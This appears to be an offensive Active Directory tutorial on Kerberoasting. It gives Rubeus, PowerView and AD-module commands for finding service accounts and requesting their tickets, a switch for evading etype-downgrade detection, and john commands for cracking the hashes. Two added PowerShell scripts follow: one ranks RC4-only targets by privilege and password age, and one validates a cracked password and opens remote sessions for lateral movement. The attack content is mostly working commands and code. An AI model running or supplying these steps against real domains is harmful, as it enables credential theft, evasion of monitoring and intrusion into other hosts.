Kerberoasting
Kerberoasting is an attack against service accounts. Any domain user can request a service ticket (ST) for any registered SPN, and the ST is encrypted with the long-term key of the account the SPN is registered to; for the RC4-HMAC etype that key is the account's NTLM hash. The attack therefore requests STs from the Ticket Granting Service (TGS) on the DC, saves the encrypted tickets, and brute-forces the service account's password offline with hashcat or john. The targets are always user accounts that are used as service accounts: computer accounts (and managed service accounts) get long random passwords generated by the DC that are rotated automatically, so they are not practical to crack.
Find user accounts used as Service accounts
Using AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Using PowerView
Get-DomainUser -SPN
Using rubeus to list kerberoast stats
Rubeus.exe kerberoast /stats
Use Rubeus to request a ST
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
To avoid detections based on Encryption Downgrade for Kerberos EType (used by the likes of MDI; 0x17 is the etype number of rc4-hmac and shows up as TicketEncryptionType in event 4769), look for kerberoastable accounts that only support RC4_HMAC. The /rc4opsec switch makes Rubeus skip accounts whose msDS-SupportedEncryptionTypes advertises AES and request RC4 tickets only for the rest, so the request is not a downgrade for those accounts.
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
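The same enumeration can be done without Rubeus. The following is an added example (not code from the original page or from Rubeus) that uses the AD module to list user accounts with SPNs and classifies them by msDS-SupportedEncryptionTypes, so that the RC4-only targets the /rc4opsec switch would pick can be reviewed together with password age and AdminCount before any ticket is requested. It assumes the RSAT ActiveDirectory module is loaded and that the domain uses the default behaviour of falling back to RC4 for user accounts whose attribute is unset; the function name Get-KerberoastableUser is mine.

```powershell
# Added example: enumerate kerberoastable user accounts and flag which ones can
# be roasted with RC4 without triggering an etype downgrade alert.
# Assumes the ActiveDirectory RSAT module is available; msDS-SupportedEncryptionTypes
# is readable by any authenticated domain user by default.
Import-Module ActiveDirectory

# Bit values of msDS-SupportedEncryptionTypes (MS-KILE section 2.2.7)
$ETYPE_RC4    = 0x4
$ETYPE_AES128 = 0x8
$ETYPE_AES256 = 0x10

function Get-KerberoastableUser {
    [CmdletBinding()]
    param(
        # Return only accounts that do not advertise AES (safe to request an RC4 ST for)
        [switch]$Rc4OpsecOnly
    )
    # krbtgt has an SPN but is never a sensible roasting target and requests for it are noisy
    $users = Get-ADUser -Filter { ServicePrincipalName -ne "$null" -and SamAccountName -ne "krbtgt" } `
        -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes', PasswordLastSet, AdminCount

    foreach ($u in $users) {
        $etypes = [int]($u.'msDS-SupportedEncryptionTypes')   # unset attribute -> 0
        # Assumption: with the attribute unset (0) the DC issues RC4 tickets for user
        # accounts, so asking for etype 0x17 is not a downgrade for those accounts.
        $supportsAes = ($etypes -band ($ETYPE_AES128 -bor $ETYPE_AES256)) -ne 0
        $rc4Only     = -not $supportsAes
        if ($Rc4OpsecOnly -and -not $rc4Only) { continue }

        [pscustomobject]@{
            SamAccountName  = $u.SamAccountName
            SPNs            = ($u.ServicePrincipalName -join ';')
            SupportedEtypes = ('0x{0:X}' -f $etypes)
            SupportsAES     = $supportsAes
            Rc4OnlyTarget   = $rc4Only
            PasswordLastSet = $u.PasswordLastSet
            AdminCount      = [bool]$u.AdminCount
        }
    }
}

# Usage: everything first, then only the opsec-safe RC4 targets, privileged and oldest passwords on top
Get-KerberoastableUser | Format-Table -AutoSize
Get-KerberoastableUser -Rc4OpsecOnly |
    Sort-Object AdminCount, PasswordLastSet -Descending |
    Format-Table -AutoSize
```

Accounts that show SupportsAES = True will still roast, but a TGS-REQ asking for RC4 against them is exactly what the downgrade detection keys on; either skip them or accept AES tickets and the much slower crack (hashcat modes 19600/19700 for etype 17/18).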
Kerberoast all possible accounts
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Crack the ticket using john the ripper (format krb5tgs; the equivalent hashcat mode is 13100)
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Once a password is cracked, build a PowerShell credential object from it and use Enter-PSSession (or Invoke-Command) to reach a computer where that user has local admin rights or some other access.
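The credential step above, as an added example that is not part of the original page. It builds a PSCredential from the recovered password, validates it against the domain before touching any host, and checks whether the account is a local administrator on the target before opening an interactive session. The domain name, the plaintext password, the target host and the helper name Test-DomainCredential are assumptions for illustration; svcadmin is the account roasted above.

```powershell
# Added example: use a cracked service-account password over PowerShell Remoting.
$domain   = 'corp.local'          # assumption: replace with the target domain
$user     = 'svcadmin'            # the account whose ST was cracked above
$password = 'Password1'           # assumption: the plaintext john recovered
$target   = 'mgmt01.corp.local'   # assumption: a host where svcadmin has rights

$secure = ConvertTo-SecureString $password -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ("$domain\$user", $secure)

# Validate the password with a simple LDAP bind so a wrong crack does not get sprayed at hosts
function Test-DomainCredential {
    param([pscredential]$Credential, [string]$Domain)
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext(
        [System.DirectoryServices.AccountManagement.ContextType]::Domain, $Domain)
    $net = $Credential.GetNetworkCredential()
    return $ctx.ValidateCredentials($net.UserName, $net.Password)
}

if (-not (Test-DomainCredential -Credential $cred -Domain $domain)) {
    throw "Credential for $domain\$user was rejected; the cracked password is wrong or the account is locked"
}

# Check local admin membership on the target without dropping into an interactive shell first
$result = Invoke-Command -ComputerName $target -Credential $cred -ScriptBlock {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $p  = New-Object System.Security.Principal.WindowsPrincipal($id)
    [pscustomobject]@{
        Host    = $env:COMPUTERNAME
        User    = $id.Name
        IsAdmin = $p.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}
$result | Format-List

# Only open the interactive session where it is actually useful
if ($result.IsAdmin) {
    Enter-PSSession -ComputerName $target -Credential $cred
}
```

Using the FQDN for -ComputerName keeps the remoting logon on Kerberos; the target records a type 3 logon (event 4624) for svcadmin, so expect it to appear in the host's security log.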